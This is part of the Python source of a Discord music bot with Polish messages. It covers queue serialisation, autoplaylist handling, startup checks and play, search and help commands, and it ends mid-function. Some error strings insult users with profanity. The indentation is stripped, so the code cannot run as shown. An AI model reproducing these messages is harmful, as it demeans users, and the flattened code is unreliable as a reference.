# This is the one event where its ok to serialize autoplaylist entries
await self.serialize_queue(player.voice_client.channel.server)
channel = entry.meta.get('kanał', None)
author = entry.meta.get('autor', None)
if channel and author:
last_np_msg = self.server_specific_data[channel.server]['last_np_msg']
if last_np_msg and last_np_msg.channel == channel:
async for lmsg in self.logs_from(channel, limit=1):
if lmsg != last_np_msg and last_np_msg:
await self.safe_delete_message(last_np_msg)
self.server_specific_data[channel.server]['last_np_msg'] = None
break # This is probably redundant
if self.config.now_playing_mentions:
newmsg = '%s - twoja piosenka **%s** jest grana na kanale %s!' % (
entry.meta['autor'].mention, entry.title, player.voice_client.channel.name)
else:
newmsg = 'Napierdalamy na %s: **%s**' % (
player.voice_client.channel.name, entry.title)
if self.server_specific_data[channel.server]['last_np_msg']:
self.server_specific_data[channel.server]['last_np_msg'] = await self.safe_edit_message(last_np_msg, newmsg, send_if_fail=True)
else:
self.server_specific_data[channel.server]['last_np_msg'] = await self.safe_send_message(channel, newmsg)
# TODO: Check channel voice state?
async def on_player_resume(self, player, entry, **_):
await self.update_now_playing_status(entry)
async def on_player_pause(self, player, entry, **_):
await self.update_now_playing_status(entry, True)
# await self.serialize_queue(player.voice_client.channel.server)
async def on_player_stop(self, player, **_):
await self.update_now_playing_status()
async def on_player_finished_playing(self, player, **_):
if not player.playlist.entries and not player.current_entry and self.config.auto_playlist:
if not self.autoplaylist_session:
log.info("Autoplaylista pusta,napierdalam własną....")
self.autoplaylist_session = self.autoplaylist[:]
while self.autoplaylist_session:
random.shuffle(self.autoplaylist_session)
song_url = random.choice(self.autoplaylist_session)
self.autoplaylist_session.remove(song_url)
info = {}
try:
info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
except downloader.youtube_dl.utils.DownloadError as e:
if 'Youtube powiedział:' in e.args[0]:
# url is bork, remove from list and put in removed list
log.error("Błąd na youtube url:\n{}".format(e.args[0]))
else:
# Probably an error from a different extractor, but I've only seen youtube's
log.error("Błąd \"{url}\": {ex}".format(url=song_url, ex=e))
await self.remove_from_autoplaylist(song_url, ex=e, delete_from_ap=True)
continue
except Exception as e:
log.error("Błąd \"{url}\": {ex}".format(url=song_url, ex=e))
log.exception()
self.autoplaylist.remove(song_url)
continue
if info.get('entries', None): # or .get('_type', '') == 'playlist'
log.debug("Ta playlista jest nie fajna,przewijam.")
# TODO: Playlist expansion
# Do I check the initial conditions again?
# not (not player.playlist.entries and not player.current_entry and self.config.auto_playlist)
try:
await player.playlist.add_entry(song_url, channel=None, author=None)
except exceptions.ExtractionError as e:
log.error("Błąd w trakcie przesyłania nutki z autoplaylisty: {}".format(e))
log.debug('', exc_info=True)
continue
break
if not self.autoplaylist:
# TODO: When I add playlist expansion, make sure that's not happening during this check
log.warning("Wyłączam autoplayliste.")
self.config.auto_playlist = False
else: # Don't serialize for autoplaylist events
await self.serialize_queue(player.voice_client.channel.server)
async def on_player_entry_added(self, player, playlist, entry, **_):
if entry.meta.get('autor') and entry.meta.get('kanał'):
await self.serialize_queue(player.voice_client.channel.server)
async def on_player_error(self, player, entry, ex, **_):
if 'kanał' in entry.meta:
await self.safe_send_message(
entry.meta['kanał'],
"```\nError from FFmpeg:\n{}\n```".format(ex)
)
else:
log.exception("Player error", exc_info=ex)
async def update_now_playing_status(self, entry=None, is_paused=False):
game = None
if not self.config.status_message:
if self.user.bot:
activeplayers = sum(1 for p in self.players.values() if p.is_playing)
if activeplayers > 1:
game = discord.Game(type=0, name="music on %s servers" % activeplayers)
entry = None
elif activeplayers == 1:
player = discord.utils.get(self.players.values(), is_playing=True)
entry = player.current_entry
if entry:
prefix = u'\u275A\u275A ' if is_paused else ''
name = u'{}{}'.format(prefix, entry.title)[:128]
game = discord.Game(type=0, name=name)
else:
game = discord.Game(type=0, name=self.config.status_message.strip()[:128])
async with self.aiolocks[_func_()]:
if game != self.last_status:
await self.change_presence(game=game)
self.last_status = game
async def update_now_playing_message(self, server, message, *, channel=None):
lnp = self.server_specific_data[server]['last_np_msg']
m = None
if message is None and lnp:
await self.safe_delete_message(lnp, quiet=True)
elif lnp: # If there was a previous lp message
oldchannel = lnp.channel
if lnp.channel == oldchannel: # If we have a channel to update it in
async for lmsg in self.logs_from(channel, limit=1):
if lmsg != lnp and lnp: # If we need to resend it
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(channel, message, quiet=True)
else:
m = await self.safe_edit_message(lnp, message, send_if_fail=True, quiet=False)
elif channel: # If we have a new channel to send it to
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(channel, message, quiet=True)
else: # we just resend it in the old channel
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(oldchannel, message, quiet=True)
elif channel: # No previous message
m = await self.safe_send_message(channel, message, quiet=True)
self.server_specific_data[server]['last_np_msg'] = m
async def serialize_queue(self, server, *, dir=None):
"""
Serialize the current queue for a server's player to json.
"""
player = self.get_player_in(server)
if not player:
return
if dir is None:
dir = 'data/%s/queue.json' % server.id
async with self.aiolocks['queue_serialization'+':'+server.id]:
log.debug("Serializing queue for %s", server.id)
with open(dir, 'w', encoding='utf8') as f:
f.write(player.serialize(sort_keys=True))
async def serialize_all_queues(self, *, dir=None):
coros = [self.serialize_queue(s, dir=dir) for s in self.servers]
await asyncio.gather(*coros, return_exceptions=True)
async def deserialize_queue(self, server, voice_client, playlist=None, *, dir=None) -> MusicPlayer:
"""
Deserialize a saved queue for a server into a MusicPlayer. If no queue is saved, returns None.
"""
if playlist is None:
playlist = Playlist(self)
if dir is None:
dir = 'data/%s/queue.json' % server.id
async with self.aiolocks['queue_serialization' + ':' + server.id]:
if not os.path.isfile(dir):
return None
log.debug("Deserializing queue for %s", server.id)
with open(dir, 'r', encoding='utf8') as f:
data = f.read()
return MusicPlayer.from_json(data, self, voice_client, playlist)
@ensure_appinfo
async def _on_ready_sanity_checks(self):
# Ensure folders exist
await self._scheck_ensure_env()
# Server permissions check
await self._scheck_server_permissions()
# playlists in autoplaylist
await self._scheck_autoplaylist()
# config/permissions async validate?
await self._scheck_configs()
async def _scheck_ensure_env(self):
log.debug("Ensuring data folders exist")
for server in self.servers:
pathlib.Path('data/%s/' % server.id).mkdir(exist_ok=True)
with open('data/server_names.txt', 'w', encoding='utf8') as f:
for server in sorted(self.servers, key=lambda s:int(s.id)):
f.write('{:<22} {}\n'.format(server.id, server.name))
if not self.config.save_videos and os.path.isdir(AUDIO_CACHE_PATH):
if self._delete_old_audiocache():
log.debug("Deleted old audio cache")
else:
log.debug("Could not delete old audio cache, moving on.")
async def _scheck_server_permissions(self):
log.debug("Checking server permissions")
pass # TODO
async def _scheck_autoplaylist(self):
log.debug("Auditing autoplaylist")
pass # TODO
async def _scheck_configs(self):
log.debug("Validating config")
await self.config.async_validate(self)
log.debug("Validating permissions config")
await self.permissions.async_validate(self)
#######################################################################################################################
async def safe_send_message(self, dest, content, **kwargs):
tts = kwargs.pop('tts', False)
quiet = kwargs.pop('quiet', False)
expire_in = kwargs.pop('expire_in', 0)
allow_none = kwargs.pop('allow_none', True)
also_delete = kwargs.pop('also_delete', None)
msg = None
lfunc = log.debug if quiet else log.warning
try:
if content is not None or allow_none:
msg = await self.send_message(dest, content, tts=tts)
except discord.Forbidden:
lfunc("Cannot send message to \"%s\", no permission", dest.name)
except discord.NotFound:
lfunc("Cannot send message to \"%s\", invalid channel?", dest.name)
except discord.HTTPException:
if len(content) > DISCORD_MSG_CHAR_LIMIT:
lfunc("WIADOMOŚĆ JEST ZA DUŻA(%s)", DISCORD_MSG_CHAR_LIMIT)
else:
lfunc("Błąd w trakcie wysyłania wiadomośći")
log.noise("Got HTTPException trying to send message to %s: %s", dest, content)
finally:
if msg and expire_in:
asyncio.ensure_future(self._wait_delete_msg(msg, expire_in))
if also_delete and isinstance(also_delete, discord.Message):
asyncio.ensure_future(self._wait_delete_msg(also_delete, expire_in))
return msg
async def safe_delete_message(self, message, *, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await self.delete_message(message)
except discord.Forbidden:
lfunc("Cannot delete message \"{}\", no permission".format(message.clean_content))
except discord.NotFound:
lfunc("Cannot delete message \"{}\", message not found".format(message.clean_content))
async def safe_edit_message(self, message, new, *, send_if_fail=False, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await self.edit_message(message, new)
except discord.NotFound:
lfunc("Cannot edit message \"{}\", message not found".format(message.clean_content))
if send_if_fail:
lfunc("Sending message instead")
return await self.safe_send_message(message.channel, new)
async def send_typing(self, destination):
try:
return await super().send_typing(destination)
except discord.Forbidden:
log.warning("Could not send typing to {}, no permission".format(destination))
async def edit_profile(self, **fields):
if self.user.bot:
return await super().edit_profile(**fields)
else:
return await super().edit_profile(self.config._password,**fields)
async def restart(self):
self.exit_signal = exceptions.RestartSignal()
await self.logout()
def restart_threadsafe(self):
asyncio.run_coroutine_threadsafe(self.restart(), self.loop)
def _cleanup(self):
try:
self.loop.run_until_complete(self.logout())
except: pass
pending = asyncio.Task.all_tasks()
gathered = asyncio.gather(*pending)
try:
gathered.cancel()
self.loop.run_until_complete(gathered)
gathered.exception()
except: pass
# noinspection PyMethodOverriding
def run(self):
try:
self.loop.run_until_complete(self.start(*self.config.auth))
except discord.errors.LoginFailure:
# Add if token, else
raise exceptions.HelpfulError(
"Bot cannot login, bad credentials.",
"Fix your %s in the options file. "
"Remember that each field should be on their own line."
% ['shit', 'Token', 'Email/Password', 'Credentials'][len(self.config.auth)]
) # ^^^^ In theory self.config.auth should never have no items
finally:
try:
self._cleanup()
except Exception:
log.error("Error in cleanup", exc_info=True)
self.loop.close()
if self.exit_signal:
raise self.exit_signal
async def logout(self):
await self.disconnect_all_voice_clients()
return await super().logout()
async def on_error(self, event, *args, **kwargs):
ex_type, ex, stack = sys.exc_info()
if ex_type == exceptions.HelpfulError:
log.error("Exception in {}:\n{}".format(event, ex.message))
await asyncio.sleep(2) # don't ask
await self.logout()
elif issubclass(ex_type, exceptions.Signal):
self.exit_signal = ex_type
await self.logout()
else:
log.error("Exception in {}".format(event), exc_info=True)
async def on_resumed(self):
log.info("\nReconnected to discord.\n")
async def on_ready(self):
dlogger = logging.getLogger('discord')
for h in dlogger.handlers:
if getattr(h, 'terminator', None) == '':
dlogger.removeHandler(h)
print()
log.debug("Connection established, ready to go.")
self.ws._keep_alive.name = 'Gateway Keepalive'
if self.init_ok:
log.debug("Received additional READY event, may have failed to resume")
return
await self._on_ready_sanity_checks()
print()
log.info('Connected to Discord!')
self.init_ok = True
################################
log.info("Bot: {0}/{1}#{2}{3}".format(
self.user.id,
self.user.name,
self.user.discriminator,
' [BOT]' if self.user.bot else ' [Userbot]'
))
owner = self._get_owner(voice=True) or self._get_owner()
if owner and self.servers:
log.info("Owner: {0}/{1}#{2}\n".format(
owner.id,
owner.name,
owner.discriminator
))
log.info('Server List:')
[log.info(' - ' + s.name) for s in self.servers]
elif self.servers:
log.warning("Owner could not be found on any server (id: %s)\n" % self.config.owner_id)
log.info('Server List:')
[log.info(' - ' + s.name) for s in self.servers]
else:
log.warning("Owner unknown, bot is not on any servers.")
if self.user.bot:
log.warning(
"To make the bot join a server, paste this link in your browser. \n"
"Note: You should be logged into your main account and have \n"
"manage server permissions on the server you want the bot to join.\n"
" " + await self.generate_invite_link()
)
print(flush=True)
if self.config.bound_channels:
chlist = set(self.get_channel(i) for i in self.config.bound_channels if i)
chlist.discard(None)
invalids = set()
invalids.update(c for c in chlist if c.type == discord.ChannelType.voice)
chlist.difference_update(invalids)
self.config.bound_channels.difference_update(invalids)
if chlist:
log.info("Bound to text channels:")
[log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in chlist if ch]
else:
print("Not bound to any text channels")
if invalids and self.config.debug_mode:
print(flush=True)
log.info("Not binding to voice channels:")
[log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in invalids if ch]
print(flush=True)
else:
log.info("Not bound to any text channels")
if self.config.autojoin_channels:
chlist = set(self.get_channel(i) for i in self.config.autojoin_channels if i)
chlist.discard(None)
invalids = set()
invalids.update(c for c in chlist if c.type == discord.ChannelType.text)
chlist.difference_update(invalids)
self.config.autojoin_channels.difference_update(invalids)
if chlist:
log.info("Autojoining voice chanels:")
[log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in chlist if ch]
else:
log.info("Not autojoining any voice channels")
if invalids and self.config.debug_mode:
print(flush=True)
log.info("Cannot autojoin text channels:")
[log.info(' - {}/{}'.format(ch.server.name.strip(), ch.name.strip())) for ch in invalids if ch]
autojoin_channels = chlist
else:
log.info("Not autojoining any voice channels")
autojoin_channels = set()
print(flush=True)
log.info("Options:")
log.info(" Command prefix: " + self.config.command_prefix)
log.info(" Default volume: {}%".format(int(self.config.default_volume * 100)))
log.info(" Skip threshold: {} votes or {}%".format(
self.config.skips_required, fixg(self.config.skip_ratio_required * 100)))
log.info(" Now Playing @mentions: " + ['Disabled', 'Enabled'][self.config.now_playing_mentions])
log.info(" Auto-Summon: " + ['Disabled', 'Enabled'][self.config.auto_summon])
log.info(" Auto-Playlist: " + ['Disabled', 'Enabled'][self.config.auto_playlist])
log.info(" Auto-Pause: " + ['Disabled', 'Enabled'][self.config.auto_pause])
log.info(" Delete Messages: " + ['Disabled', 'Enabled'][self.config.delete_messages])
if self.config.delete_messages:
log.info(" Delete Invoking: " + ['Disabled', 'Enabled'][self.config.delete_invoking])
log.info(" Debug Mode: " + ['Disabled', 'Enabled'][self.config.debug_mode])
log.info(" Downloaded songs will be " + ['deleted', 'saved'][self.config.save_videos])
if self.config.status_message:
log.info(" Status message: " + self.config.status_message)
print(flush=True)
await self.update_now_playing_status()
# maybe option to leave the ownerid blank and generate a random command for the owner to use
# wait_for_message is pretty neato
await self._join_startup_channels(autojoin_channels, autosummon=self.config.auto_summon)
# t-t-th-th-that's all folks!
async def cmd_help(self, command=None):
"""
Usage:
{command_prefix}help [command]
Prints a help message.
If a command is specified, it prints a help message for that command.
Otherwise, it lists the available commands.
"""
if command:
cmd = getattr(self, 'cmd_' + command, None)
if cmd and not hasattr(cmd, 'dev_cmd'):
return Response(
"```\n{}```".format(
dedent(cmd.__doc__)
).format(command_prefix=self.config.command_prefix),
delete_after=60
)
else:
return Response("Nie ma takiej komendy", delete_after=10)
else:
helpmsg = "**Dostępne Komendy**\n```"
commands = []
for att in dir(self):
if att.startswith('cmd_') and att != 'cmd_help' and not hasattr(getattr(self, att), 'dev_cmd'):
command_name = att.replace('cmd_', '').lower()
commands.append("{}{}".format(self.config.command_prefix, command_name))
helpmsg += ", ".join(commands)
helpmsg += "```\n<>"
helpmsg += "Możesz też uzyc `{}help x` aby dowiedzieć paru rzeczy się o poszczególnych komendach.".format(self.config.command_prefix)
return Response(helpmsg, reply=True, delete_after=60)
async def cmd_blacklist(self, message, user_mentions, option, something):
"""
Usage:
{command_prefix}blacklist [ + | - | add | remove ] @UserName [@UserName2 ...]
Add or remove users to the blacklist.
Blacklisted users are forbidden from using bot commands.
"""
if not user_mentions:
raise exceptions.CommandError("No users listed.", expire_in=20)
if option not in ['+', '-', 'add', 'remove']:
raise exceptions.CommandError(
'Invalid option "%s" specified, use +, -, add, or remove' % option, expire_in=20
)
for user in user_mentions.copy():
if user.id == self.config.owner_id:
print("[Commands:Blacklist] The owner cannot be blacklisted.")
user_mentions.remove(user)
old_len = len(self.blacklist)
if option in ['+', 'add']:
self.blacklist.update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
'%s users have been added to the blacklist' % (len(self.blacklist) - old_len),
reply=True, delete_after=10
)
else:
if self.blacklist.isdisjoint(user.id for user in user_mentions):
return Response('none of those users are in the blacklist.', reply=True, delete_after=10)
else:
self.blacklist.difference_update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
'%s users have been removed from the blacklist' % (old_len - len(self.blacklist)),
reply=True, delete_after=10
)
async def cmd_id(self, author, user_mentions):
"""
Usage:
{command_prefix}id [@user]
Tells the user their id or the id of another user.
"""
if not user_mentions:
return Response('your id is `%s`' % author.id, reply=True, delete_after=35)
else:
usr = user_mentions[0]
return Response("%s's id is `%s`" % (usr.name, usr.id), reply=True, delete_after=35)
async def cmd_save(self, player):
"""
Usage:
{command_prefix}save
Saves the current song to the autoplaylist.
"""
if player.current_entry and not isinstance(player.current_entry, StreamPlaylistEntry):
url = player.current_entry.url
if url not in self.autoplaylist:
self.autoplaylist.append(url)
write_file(self.config.auto_playlist_file, self.autoplaylist)
log.debug("Appended {} to autoplaylist".format(url))
return Response('\N{THUMBS UP SIGN}')
else:
raise exceptions.CommandError('Już jest w autoplayliscie.')
else:
raise exceptions.CommandError('There is no valid song playing.')
@owner_only
async def cmd_wejdz(self, message, server_link=None):
"""
Usage:
{command_prefix}joinserver invite_link
Asks the bot to join a server. Note: Bot accounts cannot use invite links.
"""
if self.user.bot:
url = await self.generate_invite_link()
return Response(
"Kliknij by dodać mnie na serwer.: \n{}".format(url),
reply=True, delete_after=30
)
try:
if server_link:
await self.accept_invite(server_link)
return Response("\N{THUMBS UP SIGN}")
except:
raise exceptions.CommandError('Invalid URL provided:\n{}\n'.format(server_link), expire_in=30)
async def cmd_play(self, player, channel, author, permissions, leftover_args, song_url):
"""
Usage:
{command_prefix}play song_link
{command_prefix}play text to search for
Adds the song to the playlist. If a link is not provided, the first
result from a youtube search is added to the queue.
"""
song_url = song_url.strip('<>')
await self.send_typing(channel)
if leftover_args:
song_url = ' '.join([song_url, *leftover_args])
linksRegex = '((http(s)*:[/][/]|www.)([a-z]|[A-Z]|[0-9]|[/.]|[~])*)'
pattern = re.compile(linksRegex)
matchUrl = pattern.match(song_url)
if matchUrl is None:
song_url = song_url.replace('/', '%2F')
async with self.aiolocks[_func_() + ':' + author.id]:
if permissions.max_songs and player.playlist.count_for_user(author) >= permissions.max_songs:
raise exceptions.PermissionsError(
"Osiagnales limit requestow debilu zajebany (%s)" % permissions.max_songs, expire_in=30
)
try:
info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
except Exception as e:
raise exceptions.CommandError(e, expire_in=30)
if not info:
raise exceptions.CommandError(
"Nie umiem grac muzyki smuteg. Try using the {}stream command.".format(self.config.command_prefix),
expire_in=30
)
# abstract the search handling away from the user
# our ytdl options allow us to use search strings as input urls
if info.get('url', '').startswith('ytsearch'):
# print("[Command:play] Searching for \"%s\"" % song_url)
info = await self.downloader.extract_info(
player.playlist.loop,
song_url,
download=False,
process=True, # ASYNC LAMBDAS WHEN
on_error=lambda e: asyncio.ensure_future(
self.safe_send_message(channel, "```\n%s\n```" % e, expire_in=120), loop=self.loop),
retry_on_error=True
)
if not info:
raise exceptions.CommandError(
"No cusz,zjebalo sie. "
"Restartuj bota kurwo.", expire_in=30
)
if not all(info.get('entries', [])):
# empty list, no data
log.debug("Got empty list, no data")
return
# TODO: handle 'webpage_url' being 'ytsearch:...' or extractor type
song_url = info['entries'][0]['webpage_url']
info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
# Now I could just do: return await self.cmd_play(player, channel, author, song_url)
# But this is probably fine
# TODO: Possibly add another check here to see about things like the bandcamp issue
# TODO: Where ytdl gets the generic extractor version with no processing, but finds two different urls
if 'entries' in info:
# I have to do exe extra checks anyways because you can request an arbitrary number of search results
if not permissions.allow_playlists and ':search' in info['extractor'] and len(info['entries']) > 1:
raise exceptions.PermissionsError("You are not allowed to request playlists", expire_in=30)
# The only reason we would use this over `len(info['entries'])` is if we add `if _` to this one
num_songs = sum(1 for _ in info['entries'])
if permissions.max_playlist_length and num_songs > permissions.max_playlist_length:
raise exceptions.PermissionsError(
"Playlist has too many entries (%s > %s)" % (num_songs, permissions.max_playlist_length),
expire_in=30
)
# This is a little bit weird when it says (x + 0 > y), I might add the other check back in
if permissions.max_songs and player.playlist.count_for_user(author) + num_songs > permissions.max_songs:
raise exceptions.PermissionsError(
"Playlist entries + your already queued songs reached limit (%s + %s > %s)" % (
num_songs, player.playlist.count_for_user(author), permissions.max_songs),
expire_in=30
)
if info['extractor'].lower() in ['youtube:playlist', 'soundcloud:set', 'bandcamp:album']:
try:
return await self._cmd_play_playlist_async(player, channel, author, permissions, song_url, info['extractor'])
except exceptions.CommandError:
raise
except Exception as e:
log.error("Error queuing playlist", exc_info=True)
raise exceptions.CommandError("Error queuing playlist:\n%s" % e, expire_in=30)
t0 = time.time()
# My test was 1.2 seconds per song, but we maybe should fudge it a bit, unless we can
# monitor it and edit the message with the estimated time, but that's some ADVANCED SHIT
# I don't think we can hook into it anyways, so this will have to do.
# It would probably be a thread to check a few playlists and get the speed from that
# Different playlists might download at different speeds though
wait_per_song = 1.2
procmesg = await self.safe_send_message(
channel,
'Gathering playlist information for {} songs{}'.format(
num_songs,
', ETA: {} seconds'.format(fixg(
num_songs * wait_per_song)) if num_songs >= 10 else '.'))
# We don't have a pretty way of doing this yet. We need either a loop
# that sends these every 10 seconds or a nice context manager.
await self.send_typing(channel)
# TODO: I can create an event emitter object instead, add event functions, and every play list might be asyncified
# Also have a "verify_entry" hook with the entry as an arg and returns the entry if its ok
entry_list, position = await player.playlist.import_from(song_url, channel=channel, author=author)
tnow = time.time()
ttime = tnow - t0
listlen = len(entry_list)
drop_count = 0
if permissions.max_song_length:
for e in entry_list.copy():
if e.duration > permissions.max_song_length:
player.playlist.entries.remove(e)
entry_list.remove(e)
drop_count += 1
# Im pretty sure there's no situation where this would ever break
# Unless the first entry starts being played, which would make this a race condition
if drop_count:
print("Dropped %s songs" % drop_count)
log.info("Processed {} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
listlen,
fixg(ttime),
ttime / listlen if listlen else 0,
ttime / listlen - wait_per_song if listlen - wait_per_song else 0,
fixg(wait_per_song * num_songs))
)
await self.safe_delete_message(procmesg)
if not listlen - drop_count:
raise exceptions.CommandError(
"No songs were added, all songs were over max duration (%ss)" % permissions.max_song_length,
expire_in=30
)
reply_text = "Enqueued **%s** songs to be played. Position in queue: %s"
btext = str(listlen - drop_count)
else:
if permissions.max_song_length and info.get('duration', 0) > permissions.max_song_length:
raise exceptions.PermissionsError(
"Song duration exceeds limit (%s > %s)" % (info['duration'], permissions.max_song_length),
expire_in=30
)
try:
entry, position = await player.playlist.add_entry(song_url, channel=channel, author=author)
except exceptions.WrongEntryTypeError as e:
if e.use_url == song_url:
log.warning("Determined incorrect entry type, but suggested url is the same. Help.")
log.debug("Assumed url \"%s\" was a single entry, was actually a playlist" % song_url)
log.debug("Using \"%s\" instead" % e.use_url)
return await self.cmd_play(player, channel, author, permissions, leftover_args, e.use_url)
reply_text = "Enqueued **%s** to be played. Position in queue: %s"
btext = entry.title
if position == 1 and player.is_stopped:
position = 'Up next!'
reply_text %= (btext, position)
else:
try:
time_until = await player.playlist.estimate_time_until(position, player)
reply_text += ' - estimated time until playing: %s'
except:
traceback.print_exc()
time_until = ''
reply_text %= (btext, position, ftimedelta(time_until))
return Response(reply_text, delete_after=30)
async def _cmd_play_playlist_async(self, player, channel, author, permissions, playlist_url, extractor_type):
"""
Secret handler to use the async wizardry to make playlist queuing non-"blocking"
"""
await self.send_typing(channel)
info = await self.downloader.extract_info(player.playlist.loop, playlist_url, download=False, process=False)
if not info:
raise exceptions.CommandError("That playlist cannot be played.")
num_songs = sum(1 for _ in info['entries'])
t0 = time.time()
busymsg = await self.safe_send_message(
channel, "Processing %s songs..." % num_songs) # TODO: From playlist_title
await self.send_typing(channel)
entries_added = 0
if extractor_type == 'youtube:playlist':
try:
entries_added = await player.playlist.async_process_youtube_playlist(
playlist_url, channel=channel, author=author)
# TODO: Add hook to be called after each song
# TODO: Add permissions
except Exception:
log.error("Error processing playlist", exc_info=True)
raise exceptions.CommandError('Error handling playlist %s queuing.' % playlist_url, expire_in=30)
elif extractor_type.lower() in ['soundcloud:set', 'bandcamp:album']:
try:
entries_added = await player.playlist.async_process_sc_bc_playlist(
playlist_url, channel=channel, author=author)
# TODO: Add hook to be called after each song
# TODO: Add permissions
except Exception:
log.error("Error processing playlist", exc_info=True)
raise exceptions.CommandError('Error handling playlist %s queuing.' % playlist_url, expire_in=30)
songs_processed = len(entries_added)
drop_count = 0
skipped = False
if permissions.max_song_length:
for e in entries_added.copy():
if e.duration > permissions.max_song_length:
try:
player.playlist.entries.remove(e)
entries_added.remove(e)
drop_count += 1
except:
pass
if drop_count:
log.debug("Dropped %s songs" % drop_count)
if player.current_entry and player.current_entry.duration > permissions.max_song_length:
await self.safe_delete_message(self.server_specific_data[channel.server]['last_np_msg'])
self.server_specific_data[channel.server]['last_np_msg'] = None
skipped = True
player.skip()
entries_added.pop()
await self.safe_delete_message(busymsg)
songs_added = len(entries_added)
tnow = time.time()
ttime = tnow - t0
wait_per_song = 1.2
# TODO: actually calculate wait per song in the process function and return that too
# This is technically inaccurate since bad songs are ignored but still take up time
log.info("Processed {}/{} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
songs_processed,
num_songs,
fixg(ttime),
ttime / num_songs if num_songs else 0,
ttime / num_songs - wait_per_song if num_songs - wait_per_song else 0,
fixg(wait_per_song * num_songs))
)
if not songs_added:
basetext = "No songs were added, all songs were over max duration (%ss)" % permissions.max_song_length
if skipped:
basetext += "\nAdditionally, the current song was skipped for being too long."
raise exceptions.CommandError(basetext, expire_in=30)
return Response("Enqueued {} songs to be played in {} seconds".format(
songs_added, fixg(ttime, 1)), delete_after=30)
async def cmd_stream(self, player, channel, author, permissions, song_url):
"""
Usage:
{command_prefix}stream song_link
Enqueue a media stream.
This could mean an actual stream like Twitch or shoutcast, or simply streaming
media without predownloading it. Note: FFmpeg is notoriously bad at handling
streams, especially on poor connections. You have been warned.
"""
song_url = song_url.strip('<>')
if permissions.max_songs and player.playlist.count_for_user(author) >= permissions.max_songs:
raise exceptions.PermissionsError(
"You have reached your enqueued song limit (%s)" % permissions.max_songs, expire_in=30
)
await self.send_typing(channel)
await player.playlist.add_stream_entry(song_url, channel=channel, author=author)
return Response(":+1:", delete_after=6)
async def cmd_szukaj(self, player, channel, author, permissions, leftover_args):
"""
Usage:
{command_prefix}szukaj [service] [number] query
Searches a service for a video and adds it to the queue.
- service: any one of the following services:
- youtube (yt) (default if unspecified)
- soundcloud (sc)
- yahoo (yh)
- number: return a number of video results and waits for user to choose one
- defaults to 3 if unspecified
- note: If your search query starts with a number,
you must put your query in quotes
- ex: {command_prefix}search 2 "I ran seagulls"
The command issuer can use reactions to indicate their response to each result.
"""
if permissions.max_songs and player.playlist.count_for_user(author) > permissions.max_songs:
raise exceptions.PermissionsError(
"Osiągnąłeś limit playlisty kutasie. (%s)" % permissions.max_songs,
expire_in=30
)
def argcheck():
if not leftover_args:
# noinspection PyUnresolvedReferences
raise exceptions.CommandError(
"Please specify a search query.\n%s" % dedent(
self.cmd_search.__doc__.format(command_prefix=self.config.command_prefix)),
expire_in=60
)
argcheck()
try:
leftover_args = shlex.split(' '.join(leftover_args))
except ValueError:
raise exceptions.CommandError("Please quote your search query properly.", expire_in=30)
service = 'youtube'
items_requested = 3
max_items = 10 # this can be whatever, but since ytdl uses about 1000, a small number might be better
services = {
'youtube': 'ytsearch',
'soundcloud': 'scsearch',
'yahoo': 'yvsearch',
'yt': 'ytsearch',
'sc': 'scsearch',
'yh': 'yvsearch'
}
if leftover_args[0] in services:
service = leftover_args.pop(0)
argcheck()
if leftover_args[0].isdigit():
items_requested = int(leftover_args.pop(0))
argcheck()
if items_requested > max_items:
raise exceptions.CommandError("You cannot search for more than %s videos" % max_items)
# Look jake, if you see this and go "what the fuck are you doing"
# and have a better idea on how to do this, i'd be delighted to know.
# I don't want to just do ' '.join(leftover_args).strip("\"'")
# Because that eats both quotes if they're there
# where I only want to eat the outermost ones
if leftover_args[0][0] in '\'"':
lchar = leftover_args[0][0]
leftover_args[0] = leftover_args[0].lstrip(lchar)
leftover_args[-1] = leftover_args[-1].rstrip(lchar)
search_query = '%s%s:%s' % (services[service], items_requested, ' '.join(leftover_args))
search_msg = await self.send_message(channel, "Searching for videos...")
await self.send_typing(channel)
try:
info = await self.downloader.extract_info(player.playlist.loop, search_query, download=False, process=True)
except Exception as e:
await self.safe_edit_message(search_msg, str(e), send_if_fail=True)
return
else:
await self.safe_delete_message(search_msg)
if not info:
return Response("No videos found.", delete_after=30)
for e in info['entries']:
result_message = await self.safe_send_message(channel, "Result %s/%s: %s" % (
info['entries'].index(e) + 1, len(info['entries']), e['webpage_url']))
reactions = ['\u2705', '\U0001F6AB', '\U0001F3C1']
for r in reactions:
await self.add_reaction(result_message, r)
res = await self.wait_for_reaction(reactions, user=author, timeout=30, message=result_message)
if not res:
await self.safe_delete_message(result_message)
return
if res.reaction.emoji == '\u2705': # check
await self.safe_delete_message(result_message)
await self.cmd_play(player, channel, author, permissions, [], e['webpage_url'])
return Response("Alright, coming right up!", delete_after=30)
elif res.reaction.emoji == '\U0001F6AB': # cross
await self.safe_delete_message(result_message)
continue
else:
await self.safe_delete_message(result_message)
break
return Response("Oh well \N{SLIGHTLY FROWNING FACE}", delete_after=30)
async def cmd_np(self, player, channel, server, message):
"""
Usage:
{command_prefix}np
Displays the current song in chat.
"""
if player.current_entry:
if self.server_specific_data[server]['last_np_msg']:
await self.safe_delete_message(self.server_specific_data[server]['last_np_msg'])
self.server_specific_data[server]['last_np_msg'] = None
# TODO: Fix timedelta garbage with util function
song_progress = ftimedelta(timedelta(seconds=player.progress))
song_total = ftimedelta(timedelta(seconds=player.current_entry.duration))
streaming = isinstance(player.current_entry, StreamPlaylistEntry)
prog_str = ('`[{progress}]`' if streaming else '`[{progress}/{total}]`').format(
progress=song_progress, total=song_total
)
action_text = 'Streaming' if streaming else 'Playing'
